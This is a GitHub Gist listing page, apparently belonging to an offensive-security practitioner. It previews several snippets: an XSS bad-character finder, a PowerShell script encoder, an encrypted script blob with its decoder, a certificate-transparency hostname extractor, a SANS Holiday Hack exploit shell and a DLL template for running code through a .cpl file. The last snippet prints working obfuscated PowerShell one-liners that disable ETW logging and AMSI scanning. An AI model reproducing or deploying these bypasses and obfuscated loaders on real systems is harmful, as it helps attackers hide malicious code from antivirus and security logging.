Skip to content

Instantly share code, notes, and snippets.

@reigningshells
reigningshells / badchars.py
Created May 24, 2019
Simple script to identify an XSS filters "bad characters"
View badchars.py
#!/usr/bin/env python
"""
Very simple script to automate the discovery of
bad characters in XSS filters that replace
the entire user input string with an empty string
[CR] = Carriage Return or \r
[LF] = Line Feed or \n
@reigningshells
reigningshells / script-encoder.ps1
Last active Jan 30, 2020
Just some script encoding musings
View script-encoder.ps1
Function Encode-Script
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Key
View cryptedkerb.ps1
function Expand-Script($Key)
{
$script = 'aYBcG3Uj0ZnntfLj7RcOGoI2DF7qsMjyiUl8sSgzNuiasymplD/6TedvjCI9NxVWeKoPGahMzCTi7XaBc1qUKQc0sFHiel6Ws4MnXSyd5KOXrTaA6DguIDDJAFypuittSp5ENc6A3SUZUHMB+dDHDwycN6cY6Olq7qB8c5Q2CiTdaieiwp7VbSCAgzJxD4QLQWlxqXDcaJ0caqnaPvUDgJUdgDvO9Ts6JBankNuMTaUsb02+ocZBz/7acSatXFLBQqi+1mAiIBDrCSoMYcFCswS0A9XNN5z/n1Z/ver8Qy53jJDBUrhwI79/4oKtdohzEbSyYtHs6JQKaanPGhtqlAZxiq1Y3IWFzt6xytNx6ULsKIASIo0CQ08dx5ECYZFpulo+LC+NrQxYzNigqkrgdHT01rEQr4EUFslvEknLEDOal9SRX2IfWTvKe64uUbWZmSmqLyOBajlEjvflEog5jKLVTXLY2fpzPVuJQANM8r5TcfO2GS7Sit2sb2cv8yZqWixypQtwqRgAjeDHuhtdKVk3cvfOyS7XoUzyv880DiTr1k5RAX0vxbqStjz41HP4FitJCHjfK4w4QljnllCAjU9n2bvqqQ3t2TMdFH2WTLs//cN1ci3gT3YKLo2UI/PUuZtYfv3pPRwtF+0aZncjAEFB413kUuDyotzFXqcfo0M/kq44LXsi1j7/YvmcJ9q6YfpcDxFmJ4+2wdk28iSMIOz9d303s2FU9K740jcM5ftdCD8/+vAT8lRg7zfUGZ5AHgb7864408gGgI4+xZKGK4FR+0RdAd7zs7D+yeIfWdkmYrcJ72+y7guk0Od+lFHrxQRWQLZ7MDjpjD1+qIu+O4YuSiUtDYLAix0iT3G8o3Kqq9lwZ3P9j42hwoNjrXI0TPY42OTGqZDRPUJl+V4bMy+0GTJ2Vq/+peNI4qjBPH0XPMU4+S1gizFPSPXKz/S4upC3yhP6fie6UVBPZAk
@reigningshells
reigningshells / cert-transparency-extractor.py
Last active Jul 20, 2020
Simple script to extract hostnames from cert transparency logs at crt.sh
View cert-transparency-extractor.py
#!/usr/bin/env python3
import sys
import argparse
import requests
from lxml import html
import urllib3
# Nobody wants to see SSL warnings :-P
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@reigningshells
reigningshells / HH2020-tag-generator-pseudo-shell.py
Created Jan 23, 2021
SANS Holiday Hack 2020 Broken Tag Generator Exploit - Solution for Objective 8
View HH2020-tag-generator-pseudo-shell.py
#!/usr/bin/env python3
import sys
import argparse
import string
import random
import requests
import urllib3
import base64
import readline
@reigningshells
reigningshells / Cplapplet.cpp
Created Mar 7, 2021
DllMain template to execute code in a .cpl file which is just a renamed DLL that exports a function CplApplet
View Cplapplet.cpp
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <Windows.h>
extern "C" __declspec(dllexport) LONG CplApplet()
{
MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0);
return 1;
}
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active Jun 11, 2021
Random PowerShell Bypasses
View powershell-bypasses.ps1
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation: